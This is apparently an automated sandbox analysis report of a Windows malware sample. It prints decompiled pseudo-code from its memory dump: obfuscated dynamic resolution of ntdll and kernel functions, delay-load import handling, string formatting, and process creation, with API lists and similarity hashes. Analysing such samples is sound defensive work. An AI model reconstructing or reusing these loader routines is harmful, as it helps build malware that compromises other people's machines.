				_t115 = _t139[3] + 0x47f0000;
				_t131 = _t139[4] + 0x47f0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x47f0000;
				_v16 = _t139[5] + 0x47f0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x47f0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x47fd1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x47fd1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x47fd1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x47fd19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x47fd1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x47fd198; // 0x0
										 *_t102 = _t125;
										 *0x47fd198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x47fd19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                                          0x047fac64
                                                          0x047fac7a
                                                          0x047fac80
                                                          0x047fac82
                                                          0x047fac87
                                                          0x047fac8d
                                                          0x047fac92
                                                          0x047fac95
                                                          0x047faca3
                                                          0x047facaa
                                                          0x047facad
                                                          0x047facb0
                                                          0x047facb1
                                                          0x047facb4
                                                          0x047facb7
                                                          0x047facba
                                                          0x047facbf
                                                          0x047facce
                                                          0x00000000
                                                          0x047facd4
                                                          0x047facde
                                                          0x047face8
                                                          0x047faced
                                                          0x047facef
                                                          0x047facf9
                                                          0x047facfc
                                                          0x047facff
                                                          0x047fad05
                                                          0x047fad07
                                                          0x047fad07
                                                          0x047fad0a
                                                          0x047fad0d
                                                          0x047fad12
                                                          0x047fad16
                                                          0x047fad29
                                                          0x047fad2b
                                                          0x047fadd3
                                                          0x047fadd3
                                                          0x047fadda
                                                          0x047faddd
                                                          0x047fade7
                                                          0x047fade7
                                                          0x047fadeb
                                                          0x047fae69
                                                          0x047fae6c
                                                          0x047fae6e
                                                          0x047fae6e
                                                          0x047fae75
                                                          0x047fae77
                                                          0x047fae81
                                                          0x047fae84
                                                          0x047fae87
                                                          0x047fae87
                                                          0x00000000
                                                          0x047faded
                                                          0x047fadf0
                                                          0x047fae1e
                                                          0x047fae28
                                                          0x047fae2c
                                                          0x047fae34
                                                          0x047fae37
                                                          0x047fae3e
                                                          0x047fae48
                                                          0x047fae48
                                                          0x047fae4c
                                                          0x047fae51
                                                          0x047fae60
                                                          0x047fae66
                                                          0x047fae66
                                                          0x047fae4c
                                                          0x00000000
                                                          0x047fadf7
                                                          0x047fadfa
                                                          0x047fae02
                                                          0x047fae17
                                                          0x047fae1c
                                                          0x00000000
                                                          0x00000000
                                                          0x047fae1c
                                                          0x00000000
                                                          0x047fae02
                                                          0x047fadf0
                                                          0x047fadeb
                                                          0x047fad31
                                                          0x047fad38
                                                          0x047fad48
                                                          0x047fad51
                                                          0x047fad55
                                                          0x047fad98
                                                          0x047fada4
                                                          0x047fadcd
                                                          0x047fada6
                                                          0x047fadaa
                                                          0x047fadb0
                                                          0x047fadb8
                                                          0x047fadba
                                                          0x047fadbd
                                                          0x047fadc3
                                                          0x047fadc5
                                                          0x047fadc5
                                                          0x047fadb8
                                                          0x047fadaa
                                                          0x00000000
                                                          0x047fada4
                                                          0x047fad5d
                                                          0x047fad60
                                                          0x047fad67
                                                          0x047fad77
                                                          0x047fad7a
                                                          0x047fad8a
                                                          0x00000000
                                                          0x047fad90
                                                          0x047fad71
                                                          0x047fad75
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x047fad75
                                                          0x047fad42
                                                          0x047fad46
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x047fad46
                                                          0x047fad1f
                                                          0x047fad23
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 047FACCE
                                                          • LoadLibraryA.KERNEL32(?), ref: 047FAD4B
                                                          • GetLastError.KERNEL32 ref: 047FAD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 047FAD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: 823d6b5346c2f84ba5b090cbd99b136b6a6e1673b679cfc6a5f0beef78ffdda8
                                                          • Instruction ID: 0772ff8a6c6d50b3c2bdde22b40c53b27d3b9924711bff6a08d11a88988ba967
                                                          • Opcode Fuzzy Hash: 823d6b5346c2f84ba5b090cbd99b136b6a6e1673b679cfc6a5f0beef78ffdda8
                                                          • Instruction Fuzzy Hash: BF810875A00209AFDB21CFA9DC85AAEB7F5FF48311F158429EA09E7340E7B4E945CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F6C38, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 27%
                                                          			E047F6C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x47fd33c; // 0x52e9798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E047FA557(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x47fc18c;
				}
				_t46 = E047F18A5(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E047FA71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x47fd2a8; // 0xaea5a8
						_t16 = _t75 + 0x47feb08; // 0x530025
						 *0x47fd118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E047FA557(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x47fc190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E047FA71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E047FA734(_v20);
						} else {
							_t66 =  *0x47fd2a8; // 0xaea5a8
							_t31 = _t66 + 0x47fec28; // 0x73006d
							 *0x47fd118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E047FA734(_v12);
				}
				return _v24;
			}




























                                                          0x047f6c40
                                                          0x047f6c46
                                                          0x047f6c4d
                                                          0x047f6c53
                                                          0x047f6c57
                                                          0x047f6c5b
                                                          0x047f6c5e
                                                          0x047f6c63
                                                          0x047f6c68
                                                          0x047f6c6a
                                                          0x047f6c6a
                                                          0x047f6c73
                                                          0x047f6c78
                                                          0x047f6c7d
                                                          0x047f6c83
                                                          0x047f6c8d
                                                          0x047f6c96
                                                          0x047f6c9d
                                                          0x047f6cb6
                                                          0x047f6cbb
                                                          0x047f6cc0
                                                          0x047f6cc9
                                                          0x047f6cd2
                                                          0x047f6ce3
                                                          0x047f6cec
                                                          0x047f6cf0
                                                          0x047f6cf4
                                                          0x047f6cf9
                                                          0x047f6cfe
                                                          0x047f6d00
                                                          0x047f6d00
                                                          0x047f6d0a
                                                          0x047f6d13
                                                          0x047f6d1a
                                                          0x047f6d32
                                                          0x047f6d36
                                                          0x047f6d73
                                                          0x047f6d38
                                                          0x047f6d3b
                                                          0x047f6d43
                                                          0x047f6d54
                                                          0x047f6d60
                                                          0x047f6d68
                                                          0x047f6d6c
                                                          0x047f6d6c
                                                          0x047f6d36
                                                          0x047f6d7b
                                                          0x047f6d80
                                                          0x047f6d87

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 047F6C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 047F6C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 047F6C96
                                                          • lstrlen.KERNEL32(00000000), ref: 047F6C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 047F6CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 047F6D0A
                                                          • lstrlen.KERNEL32(?), ref: 047F6D13
                                                          • lstrlen.KERNEL32(?), ref: 047F6D1A
                                                          • lstrlenW.KERNEL32(?), ref: 047F6D21
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          • Opcode ID: 96d13e6712d474727dfc6629273575f0af764468a0cad3828e590cb9ce94bd77
                                                          • Instruction ID: 76a14f6db677503f11f49f7ccb924d724ad46b6349ee55c1d90aad03aca0c1e4
                                                          • Opcode Fuzzy Hash: 96d13e6712d474727dfc6629273575f0af764468a0cad3828e590cb9ce94bd77
                                                          • Instruction Fuzzy Hash: 95410876900219FBDF12AFA4CC08DDE7BB5EF44318F154051EA05A7320D735EA55EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F8EA1, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E047F8EA1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E047F592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E047FA749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x47fd260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x47fd2a8; // 0xaea5a8
					_t18 = _t47 + 0x47fe3e6; // 0x73797325
					_t68 = E047F3C48(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x47fd2a8; // 0xaea5a8
						_t19 = _t50 + 0x47fe747; // 0x52e8cef
						_t20 = _t50 + 0x47fe0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E047FA62D();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E047FA62D();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x47fd238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E047FA734(_t70);
				goto L12;
			}


















                                                          0x047f8ea9
                                                          0x047f8ea9
                                                          0x047f8eb8
                                                          0x047f8ebf
                                                          0x047f8ec4
                                                          0x047f8fd1
                                                          0x047f8fd8
                                                          0x047f8fd8
                                                          0x047f8ed3
                                                          0x047f8edb
                                                          0x047f8ede
                                                          0x047f8ee3
                                                          0x047f8ef8
                                                          0x047f8efe
                                                          0x047f8eff
                                                          0x047f8f02
                                                          0x047f8f08
                                                          0x047f8f0b
                                                          0x047f8f10
                                                          0x047f8f18
                                                          0x047f8f24
                                                          0x047f8f28
                                                          0x047f8fb8
                                                          0x047f8f2e
                                                          0x047f8f2e
                                                          0x047f8f33
                                                          0x047f8f3a
                                                          0x047f8f4e
                                                          0x047f8f52
                                                          0x047f8fa1
                                                          0x047f8f54
                                                          0x047f8f55
                                                          0x047f8f5c
                                                          0x047f8f75
                                                          0x047f8f77
                                                          0x047f8f7b
                                                          0x047f8f82
                                                          0x047f8f9c
                                                          0x047f8f84
                                                          0x047f8f8d
                                                          0x047f8f92
                                                          0x047f8f92
                                                          0x047f8f82
                                                          0x047f8fb0
                                                          0x047f8fb0
                                                          0x047f8f28
                                                          0x047f8fbf
                                                          0x047f8fc8
                                                          0x047f8fcc
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 047F592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,047F8EBD,?,00000001,?,?,00000000,00000000), ref: 047F5952
                                                            • Part of subcall function 047F592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 047F5974
                                                            • Part of subcall function 047F592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 047F598A
                                                            • Part of subcall function 047F592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 047F59A0
                                                            • Part of subcall function 047F592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 047F59B6
                                                            • Part of subcall function 047F592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 047F59CC
                                                          • memset.NTDLL ref: 047F8F0B
                                                            • Part of subcall function 047F3C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,047F8F24,73797325), ref: 047F3C59
                                                            • Part of subcall function 047F3C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 047F3C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,052E8CEF,73797325), ref: 047F8F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 047F8F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047F8FB0
                                                            • Part of subcall function 047FA62D: GetProcAddress.KERNEL32(36776F57,047FA2D4), ref: 047FA648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 047F8F8D
                                                          • CloseHandle.KERNEL32(?), ref: 047F8F92
                                                          • GetLastError.KERNEL32(00000001), ref: 047F8F96
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 3075724336-0
                                                          • Opcode ID: e25d6377e3f8fee45c08e60bc8c50add716df508c0f4f2f27d88f266c40a7fbb
                                                          • Instruction ID: 777a77e6aad16c559d6ce8a824c9923a1fa16b5463ae0eb909a3173c3e1d07a5
                                                          • Opcode Fuzzy Hash: e25d6377e3f8fee45c08e60bc8c50add716df508c0f4f2f27d88f266c40a7fbb
                                                          • Instruction Fuzzy Hash: 7C312AB2900209BFEB11AFA4CC88DDEBBBDEB08354F014465E606A7310D735AE45DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F1BB6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 63%
                                                          			E047F1BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x47fd2a8; // 0xaea5a8
				_t1 = _t9 + 0x47fe62c; // 0x253d7325
				_t36 = 0;
				_t28 = E047F173D(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E047FA71F(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E047F64EF(_t34, _t41, _a8);
						E047FA734(_t41);
						_t42 = E047F6467(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E047FA734(_t36);
							_t36 = _t42;
						}
						_t43 = E047F17E5(_t36, _t33);
						if(_t43 != 0) {
							E047FA734(_t36);
							_t36 = _t43;
						}
					}
					E047FA734(_t28);
				}
				return _t36;
			}














                                                          0x047f1bb6
                                                          0x047f1bb9
                                                          0x047f1bba
                                                          0x047f1bc2
                                                          0x047f1bc9
                                                          0x047f1bd0
                                                          0x047f1bd4
                                                          0x047f1bda
                                                          0x047f1be1
                                                          0x047f1be6
                                                          0x047f1bf8
                                                          0x047f1bfc
                                                          0x047f1c00
                                                          0x047f1c06
                                                          0x047f1c0b
                                                          0x047f1c1b
                                                          0x047f1c1d
                                                          0x047f1c34
                                                          0x047f1c38
                                                          0x047f1c3b
                                                          0x047f1c40
                                                          0x047f1c40
                                                          0x047f1c49
                                                          0x047f1c4d
                                                          0x047f1c50
                                                          0x047f1c55
                                                          0x047f1c55
                                                          0x047f1c4d
                                                          0x047f1c58
                                                          0x047f1c58
                                                          0x047f1c63

                                                          APIs
                                                            • Part of subcall function 047F173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,047F1BD0,253D7325,00000000,00000000,7742C740,?,?,047F20C2,?), ref: 047F17A4
                                                            • Part of subcall function 047F173D: sprintf.NTDLL ref: 047F17C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,047F20C2,?,052E95B0), ref: 047F1BE1
                                                          • lstrlen.KERNEL32(?,?,?,047F20C2,?,052E95B0), ref: 047F1BE9
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • strcpy.NTDLL ref: 047F1C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 047F1C0B
                                                            • Part of subcall function 047F64EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,047F1C1A,00000000,?,?,?,047F20C2,?,052E95B0), ref: 047F6506
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,047F20C2,?,052E95B0), ref: 047F1C28
                                                            • Part of subcall function 047F6467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,047F1C34,00000000,?,?,047F20C2,?,052E95B0), ref: 047F6471
                                                            • Part of subcall function 047F6467: _snprintf.NTDLL ref: 047F64CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 7137a0b6358a0b48ce5d9c08669ed0440c912ca7c9d6fee7aa13da7d89484915
                                                          • Instruction ID: f4b54502f851fb3cc98b0b3615fe276a7defd84a9ab51577c890cd177e84a473
                                                          • Opcode Fuzzy Hash: 7137a0b6358a0b48ce5d9c08669ed0440c912ca7c9d6fee7aa13da7d89484915
                                                          • Instruction Fuzzy Hash: ED110277901628BB9B12BBB58C88CBE37ADDF456687454015FB08DB300DE38ED0697B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F6891, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 047F68EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 047F68FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 047F6911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F6979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F6988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F6993
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 25a258670f416944f072145bb1ed6ca301d5bdf53507e0b49cf9c940f98c58ff
                                                          • Instruction ID: eb386cb82df14add546f0a52281feebec8ea6034c3571a3bf8b1c1f209faa532
                                                          • Opcode Fuzzy Hash: 25a258670f416944f072145bb1ed6ca301d5bdf53507e0b49cf9c940f98c58ff
                                                          • Instruction Fuzzy Hash: E2414136910609AFDB01DFB8D844ADEB7BAEF49310F144429EE14EB360DA71ED06CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F592D, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E047F592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E047FA71F(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x47fd2a8; // 0xaea5a8
					_t1 = _t23 + 0x47fe11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x47fd2a8; // 0xaea5a8
					_t2 = _t26 + 0x47fe769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E047FA734(_t54);
					} else {
						_t30 =  *0x47fd2a8; // 0xaea5a8
						_t5 = _t30 + 0x47fe756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x47fd2a8; // 0xaea5a8
							_t7 = _t33 + 0x47fe40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x47fd2a8; // 0xaea5a8
								_t9 = _t36 + 0x47fe4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x47fd2a8; // 0xaea5a8
									_t11 = _t39 + 0x47fe779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E047F6604(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                          0x047f593c
                                                          0x047f5940
                                                          0x047f5a02
                                                          0x047f5946
                                                          0x047f5946
                                                          0x047f594b
                                                          0x047f595e
                                                          0x047f5960
                                                          0x047f5965
                                                          0x047f596d
                                                          0x047f5974
                                                          0x047f5976
                                                          0x047f597b
                                                          0x047f59fa
                                                          0x047f59fb
                                                          0x047f597d
                                                          0x047f597d
                                                          0x047f5982
                                                          0x047f598a
                                                          0x047f598c
                                                          0x047f5991
                                                          0x00000000
                                                          0x047f5993
                                                          0x047f5993
                                                          0x047f5998
                                                          0x047f59a0
                                                          0x047f59a2
                                                          0x047f59a7
                                                          0x00000000
                                                          0x047f59a9
                                                          0x047f59a9
                                                          0x047f59ae
                                                          0x047f59b6
                                                          0x047f59b8
                                                          0x047f59bd
                                                          0x00000000
                                                          0x047f59bf
                                                          0x047f59bf
                                                          0x047f59c4
                                                          0x047f59cc
                                                          0x047f59ce
                                                          0x047f59d3
                                                          0x00000000
                                                          0x047f59d5
                                                          0x047f59db
                                                          0x047f59e0
                                                          0x047f59e7
                                                          0x047f59ec
                                                          0x047f59f1
                                                          0x00000000
                                                          0x047f59f3
                                                          0x047f59f6
                                                          0x047f59f6
                                                          0x047f59f1
                                                          0x047f59d3
